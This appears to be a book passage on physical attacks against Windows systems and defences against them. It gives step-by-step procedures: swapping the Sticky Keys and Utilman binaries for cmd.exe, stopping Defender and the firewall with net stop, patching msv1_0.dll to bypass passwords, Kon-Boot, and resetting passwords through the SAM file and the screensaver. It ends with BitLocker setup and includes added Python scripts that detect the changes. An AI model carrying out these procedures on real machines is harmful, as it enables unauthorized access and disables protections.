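The substitution can be detected from the same kind of offline mount. The following Python audit, added here and not part of the book, compares the hashes of sethc.exe and utilman.exe against cmd.exe in a System32 directory and flags leftover backups such as sethc.bak; it runs against a constructed sample directory, and a real mount path such as /mnt/sda1/Windows/System32 is an assumption.

```python
import hashlib
import os
import tempfile

# Accessibility binaries the chapter describes being swapped for cmd.exe.
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe")
# Backup names an attacker following the chapter's steps leaves behind.
BACKUP_SUFFIXES = (".bak", ".old")


def sha256_of(path):
    """Hash a file in chunks so large PE files do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_system32(system32_dir):
    """Return (file, reason) findings for a mounted System32 directory.

    The check only touches the filesystem, so it works from a live CD
    against an offline Windows volume, exactly where the swap is made.
    """
    findings = []
    cmd_path = os.path.join(system32_dir, "cmd.exe")
    cmd_hash = sha256_of(cmd_path) if os.path.isfile(cmd_path) else None
    for name in ACCESSIBILITY_BINARIES:
        path = os.path.join(system32_dir, name)
        if not os.path.isfile(path):
            findings.append((name, "missing"))
            continue
        if cmd_hash is not None and sha256_of(path) == cmd_hash:
            findings.append((name, "identical to cmd.exe"))
        base = name[:-len(".exe")]
        for suffix in BACKUP_SUFFIXES:
            backup = base + suffix
            if os.path.isfile(os.path.join(system32_dir, backup)):
                findings.append((backup, "backup copy left behind"))
    return findings


def _write(directory, name, data):
    with open(os.path.join(directory, name), "wb") as f:
        f.write(data)


def build_sample_system32(directory):
    """Constructed sample mirroring the chapter's procedure: sethc.exe was
    renamed to sethc.bak and cmd.exe copied over sethc.exe. The contents
    are stand-ins, not real PE images."""
    cmd_bytes = b"MZ-constructed-cmd"
    _write(directory, "cmd.exe", cmd_bytes)
    _write(directory, "sethc.bak", b"MZ-constructed-sethc")
    _write(directory, "sethc.exe", cmd_bytes)
    _write(directory, "utilman.exe", b"MZ-constructed-utilman")


def run_demo():
    """Build the sample directory and audit it; returns the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_system32(tmp)
        return audit_system32(tmp)


if __name__ == "__main__":
    for name, reason in run_demo():
        print(f"{name}: {reason}")
```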


Once you receive a command prompt with SYSTEM access, it is time to manipulate the 
system. Typing the net user command will enumerate all of the users on the system. The net user 
command can also be used to add, delete, activate, and deactivate user accounts. In this case, the 
only account on the system is disabled. The following are examples of commands that can be used 
to manipulate users on the local system: 


- net user: Enumerates all user accounts on the local system. 
- net user jesse /active:no: Makes the only active account on the system, jesse, inactive. 
- net user jesse: Will verify that the account is disabled. 




The net stop command can be utilized by the attacker to render the machine’s protection 
mechanism useless. 


- net start: Enumerates all running services on the local system. 
- net stop “Windows Defender”: Stops the Windows Defender service. 
- net stop “Windows Firewall”: Stops the Windows Firewall service. 
- net stop “Windows Update”: Stops the Windows Update service. 
[Screenshot: net start lists the running services, including Windows Defender, Windows Firewall, 
and Windows Update; net stop “Windows Defender”, net stop “Windows Firewall”, and net stop 
“Windows Update” each report that the service was stopped successfully.] 


The net stop “Windows Firewall” command does not work on Windows XP or Windows 2003 
Server. To stop the firewall on an XP or 2003 server-based system, type the following command: 
net stop “Windows Firewall/Internet Connection Sharing (ICS)”. 




Systems prior to Windows XP, such as Windows 2000 Professional or Server, do not have 
built-in firewalls. Once this command is typed and the service stops successfully, the Windows XP 
and 2003 firewall is inactive. Windows Vista, 2008, and 7 include two interfaces for the firewall, 
the Windows Firewall and the Windows Firewall with Advanced Security. Typing net stop “Windows 
Firewall” does not disable the Windows Firewall with Advanced Security. 

Typing the command wf.msc launches the Windows Firewall with Advanced Security. 
[Screenshot: Windows Firewall with Advanced Security on Local Computer, Overview. Domain 
Profile, Private Profile (marked Active), and Public Profile each report: Windows Firewall is on; 
inbound connections that do not match a rule are blocked; outbound connections that do not match 
a rule are allowed. A Windows Firewall Properties link is shown.] 


Even though the net stop “Windows Firewall" command has been issued, the Windows 
Firewall with Advanced Security reports that the firewall is on and that the public profile is active. 
Clicking the Windows Firewall Properties link will allow the user to turn off the firewall for the 
corresponding active profile. 




Once the active profile setting has been changed to off, the Windows Firewall with Advanced 
Security is disabled. This leaves the system vulnerable to network attacks. 


[Screenshot: Overview after the change. Domain Profile and Public Profile still report that 
Windows Firewall is on; the active Private Profile reports that Windows Firewall is off.] 
By typing sysdm.cpl and clicking on the Remote tab, you can enable Remote Desktop on the 
machine. Terminal Services allows a user to remotely connect to another system over TCP port 
3389. The middle choice allows remote access without pre-authentication. 




To obtain the Internet protocol (IP) address information of the system, type ipconfig /all. 
Although the output can be quite extensive in Vista and Windows 7, look for the IPv4 address 
that is labeled "Preferred." 




Once the IP address of the target has been found, connect through a machine running Linux 
on the same network by typing rdesktop -f followed by the IP address of the target system, for 
example, rdesktop -f 192.168.232.50. This IP address should match the “Preferred” IPv4 address 
discussed just above. When connecting to the machine with remote desktop enabled, use Linux, 
Mac, or an XP machine running remote desktop. The newer versions included in Windows 7, 
2008, Vista, and updated versions of 2003 and XP require a username and password before the 
connection is made. 


Even though all user accounts are disabled on the target machine, the SYSTEM account can 
still be utilized. In order to launch a command prompt, hit Shift five times to initiate a Sticky Keys 
attack. The Utilman.exe attack can also be utilized on Vista, 2008, and Windows 7 systems that 
were altered. Oddly enough, these attacks do not show up in the security log in the event viewer. 
Type eventvwr.msc to launch the event viewer. Check Windows logs and security logs to verify 
that SYSTEM access has not been logged. 




How to Log In without Knowing the Password 


For some individuals, it can be extremely useful to be able to log in as the user and see what is 
located within that user's profile. While the Sticky Keys and Utilman hacks provide SYSTEM 
access, you cannot log into the user's account without changing the user's password. Changing 
the user's password has two serious implications: 


1. The user will realize that their password has been changed. 
2. EFS encrypted files cannot be opened once a password change has occurred. 


Sometimes good guys (and bad guys) need to log in as a specific user to get some artifacts off the 
computer and log off. There are methods and utilities that will allow attackers to log on as any user 
on the system without providing a password. One way to achieve such access is by changing a few 
bytes of a single file with a hex editor. This attack works on Windows XP. 

The following directions show how to use the BackTrack 4 DVD to change the bytes of this file: 


1. Boot to the BackTrack 4 DVD. 

2. Log in as root with the password of toor. 

3. Type startx to bring up the GUI. 

4. Open a terminal and type the following command in Linux: fdisk -l. 

In most cases, you will see a single NTFS partition. Even though the device is listed as /dev/sda1, 
in this case it is mounted to /mnt/sda1. The mount command will verify this. 

The mount command will work fine, and the last line will give you the relevant information. 
You can eliminate the extra information by typing mount | grep fuse. 




The file that needs to be altered is called msv1_0.dll. The file is located in the WINDOWS/ 
System32 directory. To enter that directory, type the following command: 
cd /mnt/sda1/WINDOWS/system32. 




It is always best practice to back up a file before changing it. Use the following command to 
copy the current msv1_0.dll file: cp msv1_0.dll msv1_0.old. 




The file msv1_0.dll needs to be changed with a hex editor. There are many good hex editors 
available for Windows and Linux. BackTrack 4 includes the tool hexedit. To edit the msv1_0.dll 
file, type the command hexedit msv1_0.dll. 


If the command was typed correctly, you will see a blue screen with a hex view of msv1_0.dll. 
If you type the file name wrong or give the incorrect path, a message will be displayed that 
says “No such file or directory”. 




The menu bar appears at the bottom of the screen. Pressing Control and W will allow the user 
to search for text strings or specific bytes within the file. Select Search for Hex bytes. 


After hitting Enter on the Search for Hex bytes menu selection, a Byte Search title bar will 
appear. Type 75 11 to search for the consecutive sequence of hex bytes 75 and 11. 


Change the hex byte values of 75 and 11 to B0 01. Press Control and X to exit and save. 


Reboot the machine into Windows. After making this change to this file, you can log on to 
Windows with any account on the machine without a password. 


Note: You will not be able to open the user's EFS encrypted files. 


Once you have completed your tasks, you should restore the previous msv1_0.dll file. To 
restore the file, boot back to the BackTrack DVD. Log in with the username of root and password 
of toor. Type startx to initiate the GUI. Open a terminal and navigate to the System32 directory by 
typing cd /mnt/sda1/WINDOWS/system32. Type the following command to delete the newer 
file and restore the original in one step: mv msv1_0.old msv1_0.dll. 
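Before the backup is moved back, the change can be documented exactly. This added Python example (not from the book) compares msv1_0.dll byte for byte with the msv1_0.old backup that the procedure leaves beside it and reports every differing offset; it runs on constructed sample data containing the same 75 11 to B0 01 change, and the file names are the ones the text uses.

```python
import os
import tempfile


def diff_bytes(current, original):
    """Return [(offset, original_byte, current_byte)] for each byte that
    differs. A size difference is reported first as ("size", old, new);
    an in-place hex edit like the one described keeps the size the same."""
    findings = []
    if len(current) != len(original):
        findings.append(("size", len(original), len(current)))
    for offset, (o, c) in enumerate(zip(original, current)):
        if o != c:
            findings.append((offset, o, c))
    return findings


def compare_dll_to_backup(dll_path, backup_path):
    """Read both files and diff them; the backup is the trusted reference."""
    with open(dll_path, "rb") as f:
        current = f.read()
    with open(backup_path, "rb") as f:
        original = f.read()
    return diff_bytes(current, original)


def format_findings(findings):
    """Render findings the way an analyst would note them in a report."""
    lines = []
    for offset, o, c in findings:
        if offset == "size":
            lines.append(f"size differs: backup {o} bytes, current {c} bytes")
        else:
            lines.append(f"offset 0x{offset:08X}: {o:02X} -> {c:02X}")
    return lines


def build_sample(directory):
    """Constructed stand-in for the DLL: filler bytes around one 75 11
    pair, and a copy with that pair rewritten to B0 01 as the text
    describes. Real msv1_0.dll contents are not reproduced here."""
    original = bytes(range(0, 64)) + b"\x75\x11" + bytes(range(64, 128))
    patched = original.replace(b"\x75\x11", b"\xB0\x01", 1)
    with open(os.path.join(directory, "msv1_0.old"), "wb") as f:
        f.write(original)
    with open(os.path.join(directory, "msv1_0.dll"), "wb") as f:
        f.write(patched)


def run_demo():
    """Build the sample pair and return the diff findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return compare_dll_to_backup(os.path.join(tmp, "msv1_0.dll"),
                                     os.path.join(tmp, "msv1_0.old"))


if __name__ == "__main__":
    for line in format_findings(run_demo()):
        print(line)
```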




Using Kon-Boot to Get into Windows without a Password 


Another way to log on to Windows (and some Linux) systems without a password is to use a CD 
called Kon-Boot. The Kon-Boot CD works on the following versions of Windows: 2008, Vista, 7, 
XP, and 2003. Kon-Boot also works on several versions of Linux, including Gentoo, Ubuntu, and 
Debian. Best of all, Kon-Boot is freeware and can be downloaded from the following link: 
http://www.piotrbania.com/all/kon-boot/. 

Navigate to the website for Kon-Boot, read the legal disclaimer over, and click the CD-ISO 
download link. Unzip the file after you download it (110 KB) to locate the ISO file. 


Insert a blank CD into your system. Open the ImgBurn program and choose the selection 
Write image file to disc. 




Click the browse button to select the image file source, navigate to the location on your hard 
drive where you downloaded the Kon-Boot ISO file, and click open. Click OK. Write the ISO 
image file to the CD by clicking the Write image to CD button. 




Start the target machine with Kon-Boot in the CD/DVD drive. A window should appear with 
a scrolling message that says "Kon-Boot, a Windows and Linux hacking utility." To proceed with 
the attack, hit Enter at the Kryptos Logic Security Software title screen. 




After pressing Enter, a colorful Kon-Boot title screen will appear. Several messages are included 
on the screen, including a website listing and that this software is not for commercial use. 


You can log on to Windows as administrator or any user without the user’s password. 


Note: You will not be able to read the user's EFS encrypted files. However, if you get the user's 
password with a utility like fgdump.exe or pwdump.exe, and you log on as the user with the 
correct password, you can open the user's EFS files. After you remove the CD and restart the 
system, users will once again be required to log on with their username and password. 


Kon-Boot also works with several flavors of Linux, including Ubuntu, Gentoo, and Debian. 
The procedure for using this utility with Linux is similar to Windows. Boot the Linux machine 
to Kon-Boot, then hit Enter at the Kryptos Logic Security Software title screen. Once the login 
screen appears, log in as kon-usr. If the prompt is a number sign (#), that means root level access 
has been obtained. The whoami command will verify that you are logged in as root. To restore it 
to its normal state, type init 6 to restart the machine or init 0 to shut it down. 




Bart’s PE and WindowsGate 


A number of years ago, a very smart and talented individual named Bart Lagerweij started 
making boot CDs and floppies. His latest creation, Bart’s PE, is an incredible utility every Windows 
user should have as part of their toolbox. Bart’s PE and the WindowsGate utility can be used on 
systems running Windows XP, 2003, Vista, 2008, and 7. 


Note: You will not be able to read EFS encrypted files. 
Bart’s website is http://nu2.nu, and there are numerous sites and forums devoted to developing 
and enhancing Bart’s PE. Bart’s PE, or preinstalled environment, can be enhanced by adding 
various plug-ins to the ISO. Please only use legal plug-ins like Mozilla Firefox; do not be tempted by 
the plethora of illegal software plug-ins available for Bart’s PE. Software piracy is a serious crime! 

In order to use Bart’s PE, you need to have a legal copy of Windows XP, and access to the i386 
installation directory. Visit http://www.nu2.nu/pebuilder/ and download the latest self-installing 
PE Builder package. 




Download the WindowsGate plug-in at http://www.virtualexile.com/wg/windowsgate.cab. After 
downloading the PE Builder exe file: 


1. Double-click the file and click Run. 
2. Select your language and click OK. 
3. Click Next to the Welcome Wizard. 
4. Click Next to Destination Location. 
5. Click Next to Select Start Menu Folder. 
6. Check the box that states “Create a Desktop Icon” and click Next. 
7. Click Install. 
8. At the completing the setup wizard page, verify that Launch PE builder is checked and click Next. 
9. Read over the PE Builder license and click “I agree” if you agree to the terms. 
10. At the search for Windows installation files, click Yes if you do not have the install CD. If 
you do have the CD, put it in the CD tray and put the CD-ROM letter in Source. 
11. Under Media output, select the Create ISO image choice. 
12. Click the Plugins tab. 


13. Click Add, browse to the location where you downloaded windowsgate.cab, select the file, 
and click the Open button. 
14. Click OK to the Name plugin folder. 
15. Click Close to close the Plugin menu. 
16. Verify Create ISO image has been selected, and click Build. 
17. Click Yes to the warning “Directory Does Not Exist, Create It?” 
18. Read over the EULA (end user license agreement) and click “I agree” if you agree. 
19. Wait for the CD to finish compiling (it can take a while). 
20. Open ImgBurn and select Write image file to disc. Select the source image, likely 
C:\pebuilder3110a\pebuilder.iso. Put in a blank CD and click Write! 


Put Bart’s CD in the target system. Click No to the option “Start network support now.” Click on 
the Go menu and find Windows Gate from the Programs menu. Highlight C:\, and place a check 
mark in the Msv1_0.dll patch box. A message box will pop up and state “Logon password 
validation is OFF.” Click on the Go menu, select Shutdown from the menu, and click Restart. Take 
the CD out, and log on without any password. 




To turn logon password validation back on, put Bart’s CD back in the target system. Click No 
to “Start network support now.” Click on the Go menu and find Windows Gate from the Programs 
menu. Highlight C: and remove the check from the Msv1_0.dll patch box. A message box will 
pop up and state “Logon password validation is ON.” Click on the Go menu, select Shutdown 
from the menu, and click Restart. All users will now be required to log on with a password. 
[Screenshot: WindowsGate for Windows 2000/XP/2003/Vista/2008 (32/64-bit), reporting “Logon 
password validation is ON”, with the options “Msv1_0.dll patch (check to disable logon password 
validation)” and “Utilman.exe (WinKey+U) replacement”. License: HOME USAGE ONLY.] 


Old School 


Getting in without the password did not present a great deal of challenge on a computer running 
the Windows NT, Windows 2000 Professional, or 2000 Server family. In order to break in, you 
can use any Windows or Linux Live CD distribution that will allow you to read and write to 
NTFS partitions. For this example, we will use Bart’s PE. 

Boot your system with your Bart’s PE Live CD. Click No to “Start network support now.” 
Click on the Go menu and find the A43 File Management Utility from the Programs menu. Click 
on the C: drive, which is usually the location. The installation directory is likely WINNT or 
Windows. After you find that directory, find the System32 directory. Look for the config directory 
and find the file called SAM. Right click on the file and rename it to SAM.old. 




Click on the Go menu, select Shutdown from the menu and click Restart. Take the Bart's PE 
CD out of the system. A new SAM file will be created upon reboot. You can log on to the system 
with the username of administrator with a blank password. To restore the original users and 
passwords, boot back up to Bart's PE and open the A43 File Management Utility from the Programs 
menu. Find the new SAM file, right click on it and select delete. Rename the SAM.old file back 
to SAM. After a reboot, all user accounts with their corresponding passwords will be restored. 
2000 Server Family Domain Controllers 


Boot your system with your Bart’s PE Live CD. Click No to “Start network support now." Click 
on the Go menu and find the A43 File Management Utility from the Programs Menu. Click 
on the C: drive, which is usually the location. The installation directory is likely WINNT or 
Windows. After you find that directory, find the System32 directory. Look for the config directory 
and find the file called SAM. Right click on the file and rename it to SAM.old. 

Renaming the SAM file will only reset the local administrator password. It will not affect 
the active directory accounts, which are stored in the NTDS.dit file. Click on the Go menu, 
select Shutdown from the menu and click Restart. Take out the Bart's PE CD and hit F8 while 
the domain controller is booting to display the advanced menu options. Select the menu choice 
Directory Services Restore Mode (Windows 2000 domain controllers only). 


Select the server operating system and click Enter. Log on to the system with the user name of 
administrator and a blank password. Click OK to the diagnostics message that Windows is 
running in safe mode. Click on Start, go up to Run, and type regedit. Find the HKEY_USERS 
registry key (fourth from the top). Expand .DEFAULT, then Control Panel, then Desktop. Double 
click on SCRNSAVE.EXE to edit the string. In the value data field, type cmd.exe and click OK. 


The default value for the screen saver to come on is 900 seconds, which is 15 minutes. This 
value is set in the string field ScreenSaveTimeOut. To change the value of this string, double click 
on it. It can be changed to 60 seconds or 10 seconds. 




Restart the machine. Shortly after the Windows 2000 server logon screen appears 
(approximately 10 seconds), a command prompt will launch instead of the screen saver. Type net 
user administrator Pa$$wOrd to change the administrator password. You should receive the 
message that the command completed successfully. Type exit to log out of the command window 
session. You can now log on to the domain controller with the username of administrator and the 
password of Pa$$wOrd. 
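A defender auditing a domain controller can look for exactly this change in an exported copy of the key. The Python below is an added example, not from the book: it parses a .reg export (constructed here) of HKEY_USERS\.DEFAULT\Control Panel\Desktop and flags a SCRNSAVE.EXE value that is not a .scr screen saver or a ScreenSaveTimeOut below the 900-second default the text cites.

```python
import re

# Constructed sample of what Registry Editor exports for the logon desktop
# key after the change described in the text: the screen saver points at
# cmd.exe and the timeout has been lowered to 10 seconds.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaveActive"="1"
"ScreenSaveTimeOut"="10"
"SCRNSAVE.EXE"="cmd.exe"

[HKEY_USERS\.DEFAULT\Control Panel\Colors]
"Background"="0 0 0"
"""

# The key whose screen saver runs on the logon screen, before anyone logs in.
LOGON_DESKTOP_KEY = r"HKEY_USERS\.DEFAULT\Control Panel\Desktop"
# Matches a REG_SZ line of a .reg export: "name"="value"
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_reg_export(text):
    """Parse the string (REG_SZ) values of a .reg export into
    {key_path: {value_name: value}}. Other value types (hex:, dword:)
    are ignored because the checks below only need string values."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                keys[current][m.group(1)] = m.group(2)
    return keys


def audit_logon_screensaver(keys, min_timeout=900):
    """Return a list of human-readable findings for the logon desktop key.

    Two conditions are flagged: a SCRNSAVE.EXE that is not a .scr file
    (the text substitutes cmd.exe) and a ScreenSaveTimeOut below
    min_timeout seconds (the text lowers it so the prompt appears sooner).
    """
    findings = []
    desktop = keys.get(LOGON_DESKTOP_KEY, {})
    exe = desktop.get("SCRNSAVE.EXE", "")
    if exe and not exe.lower().endswith(".scr"):
        findings.append(f"SCRNSAVE.EXE is {exe!r}, not a .scr screen saver")
    timeout = desktop.get("ScreenSaveTimeOut")
    if timeout is not None and timeout.isdigit() and int(timeout) < min_timeout:
        findings.append(f"ScreenSaveTimeOut lowered to {timeout} seconds")
    return findings


def run_demo(text=SAMPLE_REG):
    """Parse an export and audit it; returns the findings."""
    return audit_logon_screensaver(parse_reg_export(text))


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```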




Defending against Physical Attacks on Windows Machines 


By enabling BitLocker, the Windows system partition will be encrypted. This will prevent 
attackers from viewing data and manipulating Windows system files when they boot to a Live CD. 
Although the use of BitLocker as a security measure will be extremely effective at protecting 
your computer from physical attacks, it is only available on Server 2008 and the Ultimate and 
Enterprise versions of Windows 7 and Vista. If you do decide to implement BitLocker, consider 
the following suggestions: 


1. Back up your data before you encrypt your system volume.
2. Keep your recovery keys in a safe but hidden place. When things go wrong, the recovery keys are the only way to get your data back.
3. Consider using the digital locker. For a fee, your recovery keys can be stored in a digital locker.
4. If you are using Ultimate or Enterprise in a domain environment, consider storing the keys in Active Directory. In my experience, this works best with 2008 domain controllers.


Partitioning Your Drive for BitLocker 


BitLocker requires more than one partition. One partition holds the unencrypted files the system needs to boot; it is small (less than 2 GB), formatted NTFS, and in most cases contains nothing of value. Using BitLocker on a dual boot system with multiple partitions is not recommended, in part because the BitLocker volume is unreadable to the other operating systems.


Windows 7 


A fresh install of Windows 7 partitions the disk properly for BitLocker. However, only the Ultimate and Enterprise editions, which include the BitLocker feature, show a BitLocker Drive Encryption entry in the System and Security area of the Control Panel. The good news about Windows 7 is that no additional tool is needed to repartition the drive for BitLocker.


[Figure: Control Panel entry "BitLocker Drive Encryption: Protect your computer by encrypting data on your disk | Manage BitLocker".]


And, unlike Vista, Windows 7 makes the sub-selection "Protect your computer by encrypting data on your disk" available automatically. BitLocker still cannot be enabled on the system volume until either the trusted platform module (TPM) has been initialized or Windows group policy has been changed to allow BitLocker without a TPM. Once one of those is done, BitLocker can be enabled on the system volume.


Windows Vista 


While no additional tool is needed to configure BitLocker in Windows 7, Windows Vista needs one. Unless the partition was created manually beforehand, trying to enable BitLocker on a Vista system with a single partition produces an error:


[Dialog: "The drive configuration is unsuitable for BitLocker Drive Encryption. To use BitLocker, please re-partition your hard drive according to the BitLocker requirements." Link: Set up your hard disk for BitLocker Drive Encryption.]


To deal with this issue, Microsoft created the BitLocker Drive Preparation Tool. This free tool is only for the Ultimate edition of Vista and can be downloaded at the following link: http://www.microsoft.com/downloads/details.aspx?FamilyID=320b9aa9-47e8-44f9-b8d0-4d7d6a75add0&displaylang=en. Download the x86 file if you have a 32-bit operating system or the x64 file if you have a 64-bit operating system. The following steps prepare a Vista Ultimate system for BitLocker:


1. Double click on the downloaded BitLocker Drive Preparation Tool (.msu file).
2. Click Continue if prompted by User Account Control.
3. Click OK to install the software update.
4. Read over the license agreement and click "I accept" if you accept the terms.
5. Click Close at the Installation Complete screen.
6. Click on the Pearl (Start), go to All Programs, Accessories, System Tools, BitLocker Drive Preparation Tool.
7. Click Allow if prompted by User Account Control.
8. Read over the Microsoft Software License Terms, and click "I accept" if you agree.
9. Read the warnings and information about the S: drive that will be created.
10. Click Finish after receiving the message "BitLocker drive preparation is complete."


[Dialog: BitLocker Drive Encryption, Preparing Drive for BitLocker. "New active drive S: will be created from free space on drive C:. The boot files will be moved to the new active drive. The new active drive cannot be protected by BitLocker. Caution: Back up critical data and files before continuing. This process may require defragmentation, which may require from a few minutes to a few hours depending on the condition of your drive. Do not store important data and files on the new active drive."]


After the BitLocker Drive Preparation Tool has been installed and run on a Vista Ultimate machine, the system has two partitions: a small primary partition (less than 2 GB) holding the unencrypted boot files, and the system drive. To enable BitLocker on the system partition, either the TPM must be initialized or group policy must be changed to allow BitLocker without a TPM.


Trusted Platform Modules 


By default, Windows Vista and 7 use BitLocker with a TPM. A TPM is a hardware chip that protects the encryption keys. BitLocker seals the volume key to measurements of the boot configuration taken by that specific computer's TPM, which "ties" the encrypted drive to the hardware. If significant hardware or boot changes are made, the TPM will not release the key and Windows will not start normally; BitLocker asks for the recovery key instead. If a new video card needs to be installed, disable BitLocker in the Control Panel first, then re-enable it after the hardware change. A computer with BitLocker and a TPM is safest from attack when it is shut down completely, because a running or sleeping machine has already unsealed the key into RAM.
Using BitLocker with a TPM


BitLocker requires TPM version 1.2 or higher, and the TPM must be initialized before BitLocker can use it. The computer's BIOS usually indicates whether a TPM is present; if it is, you may need to enable it there. BIOS layouts vary by manufacturer, but the TPM is usually configured in the "Security" area. Once the TPM has been enabled in the BIOS, it can be initialized from Windows, either from the manufacturer's tool in the Windows taskbar or from the TPM Management console (tpm.msc).




Although a TPM screen can vary, most of the configuration screens will appear similar to the 
Infineon Security Platform Settings Tool. On many of these configuration screens, there will be 
an area that is designated specifically for BitLocker. 


[Figure: Infineon Security Platform Settings Tool (run as Administrator) with tabs Info, User Settings, Backup, Migration, Password Reset, BitLocker and Advanced; "Welcome to the Infineon Security Platform Solution".]


When the BitLocker tab is selected, the tool asks whether to start the TPM initialization wizard. Click Yes to initialize the TPM.

[Dialog: The Security Platform state is "Not initialized". Do you want to start the Infineon Security Platform Initialization Wizard?]

After the TPM has been initialized and the system has been properly partitioned, enabling BitLocker in the Control Panel produces no further errors. The time it takes to encrypt the volume depends on the size of the hard disk; BitLocker shows what percentage of the volume has been encrypted. Surprisingly, you should notice little difference in the performance of the system once the entire drive is encrypted.


Using BitLocker without a TPM 


The default for Windows Vista, 2008, and 7 is to use BitLocker with a TPM. To enable BitLocker volume encryption without a TPM, the default group policy settings must be changed; after that, BitLocker can be enabled in the Control Panel. When BitLocker is used without a TPM, a USB flash drive holding the startup key is required during setup and at every boot.
Windows 7


Trying to enable BitLocker volume encryption on Windows 7 without a TPM results in an error. You will get the message "A compatible TPM Security Device must be present on this computer...". This is not exactly true; a change to a single group policy setting lets you use BitLocker without a TPM.

[Dialog: A compatible Trusted Platform Module (TPM) Security Device must be present on this computer, but a TPM was not found. Please contact your system administrator to enable BitLocker.]


The following steps enable BitLocker without a TPM on a computer running Windows 7:

1. Click on the Pearl (Start), go up to Run and type the command gpedit.msc.
2. Double click on Computer Configuration.
3. Expand the Administrative Templates folder (third from the bottom).
4. Expand the Windows Components folder.
5. Expand the BitLocker Drive Encryption folder.
6. Select Operating System Drives.
7. Double click on the first setting in the list, entitled "Require additional authentication at startup."
8. Click the Enabled radio button.
9. Check the box that states "Allow BitLocker without a compatible TPM."


[Figure: group policy setting "Require additional authentication at startup" (Supported on: Windows 7 family) set to Enabled, with "Allow BitLocker without a compatible TPM (requires a startup key on a USB flash drive)" checked. The help text reads: "If you want to use BitLocker on a computer without a TPM, select the 'Allow BitLocker without a compatible TPM' check box. In this mode a USB drive is required for start-up and the key information used to encrypt the drive is stored on the USB drive, creating a USB key. When the USB key is inserted the access to the drive is authenticated and the drive is accessible. If the USB key is lost or unavailable you will need to use one of the BitLocker recovery options to access the drive. On a computer with a compatible TPM, four types of authentication methods can be used at startup to provide added protection for encrypted data. When the computer starts, it can use only the TPM for authentication, or it can also require insertion of a USB flash drive containing a startup key, the entry of a 4-digit to 20-digit personal identification number (PIN), or ..." The "Settings for computers with a TPM" section offers Configure TPM startup (Allow TPM), Configure TPM startup PIN (Allow startup PIN with TPM) and Configure TPM startup key (Allow startup key with TPM).]


10. After the group policy setting has been changed, go to the Control Panel, System and 
Security, and select Turn On BitLocker. 
[Figure: Control Panel, System and Security, BitLocker Drive Encryption. "Help protect your files and folders by encrypting your drives. BitLocker Drive Encryption helps prevent unauthorized access to any files stored on the drives shown below. You are able to use the computer normally, but unauthorized users cannot read or use your files." Hard Disk Drives: C: Off, Turn On BitLocker. BitLocker To Go: Insert a removable drive to use BitLocker To Go. See also: TPM Administration, Disk Management.]


11. Click Next at the BitLocker Drive Encryption setup screen. 


[Dialog: BitLocker Drive Encryption setup. "The following preparations will be made on this computer to enable BitLocker: Prepare your drive for BitLocker; Encrypt the drive."]


12. Carefully review the two warning messages at the bottom of the screen. Back up your critical data before you proceed, and click Next when you are ready to continue.

[Dialog, Caution: "We recommend that you back up critical files and data before continuing. Use Backup and Restore Center to perform a backup. This process might take awhile, depending on the size and fragmentation condition of the drive."]


13. If your system currently has only a single partition, you will see the messages "Shrinking drive C:," "Creating new system drive," and "Preparing drive for BitLocker." Click Restart Now when drive preparation is complete.

[Figure: BitLocker Drive Encryption (C:), "Preparing your drive for BitLocker. Do not turn off or restart your computer until this process has been completed." Steps: Shrinking drive C:, Creating new system drive, Preparing drive for BitLocker.]


14. After restarting the system, your screen should show a green check next to "Prepare your drive for BitLocker." Click Next to encrypt the drive.

15. Insert your USB flash drive. At the Set BitLocker startup preferences screen, select "Require a Startup key at every startup."


[Dialog: BitLocker Drive Encryption (C:), Set BitLocker startup preferences. "This computer does not appear to have a TPM. To use BitLocker Drive Encryption, a startup key on a USB flash drive will be required every time you start the computer." Options: Use BitLocker without additional keys; Require a PIN at every startup; Require a Startup key at every startup. Note: "Some settings are managed by your system administrator."]


16. At the Save your startup key window, verify that your USB device has been recognized and click Save. When you turn on the computer, the USB device must be present or the system will not boot.

17. There are three options for saving the all-important recovery key:

- Save the recovery key to a USB flash drive.
- Save the recovery key to a file.
- Print the recovery key.

18. Anyone who has possession of the recovery key can decrypt the data. It is wise to print the recovery key as well as save it to the USB drive; select both the "Save the recovery key to a USB flash drive" and "Print the recovery key" options to do so.

[Dialog options: Save the recovery key to a USB flash drive; Save the recovery key to a file; Print the recovery key.]


19. The final screen in the setup wizard is titled "Are you ready to encrypt this drive?" By default, the system runs a BitLocker system check to confirm that your keys work before the volume is encrypted. If the system reboots and is able to read the keys, encryption starts once the operating system loads.

A status bar indicates the progress of the encryption. After the process is finished, the system informs you that the encryption of C: is complete.

[Figure: "Encrypting... Drive C: 20.9% Completed."]


20. After the encryption has completed, the Disk Management utility can be used to view the current configuration. Right click on Computer in the Start menu, select Manage, expand the Storage folder and double click Disk Management. On Windows 7, the disk should show a small system reserved partition (100 MB on a default Windows 7 install; 300 MB in the figure below) alongside the BitLocker encrypted volume.

[Figure: Disk Management showing a 15.71 GB NTFS volume (BitLocker Encrypted; Healthy: Boot, Page File, Crash Dump, Primary Partition) and a 300 MB NTFS volume (Healthy: System, Active, Primary Partition).]


Vista and 2008 


The default setting of Vista and 2008 systems is to use BitLocker in conjunction with a TPM. If your system lacks TPM hardware and you click on the BitLocker icon in the Control Panel, a "TPM was not found" error message is displayed.

[Dialog: "A TPM was not found. A TPM is required to turn on BitLocker. If your computer has a TPM, then contact the computer manufacturer for BitLocker-compatible BIOS."]


The following steps are needed on a computer running the Vista or 2008 operating system to 
enable BitLocker without a TPM: 


1. Click on the Pearl (Start), go up to run and type the command gpedit.msc. 
2. Click Continue if prompted by User Account Control. 

3. Double click on Computer Configuration. 

4. Expand the Administrative Templates folder (third from the bottom). 
5. Expand the Windows Components folder.

6. Expand the BitLocker Drive Encryption folder. 

7. Double click on the fourth setting in the list, entitled 

“Control Panel Setup: Enable advanced startup options.” 

8. Click the Enabled radio button. 

9. Go into the Control Panel and click the BitLocker Drive Encryption icon. 
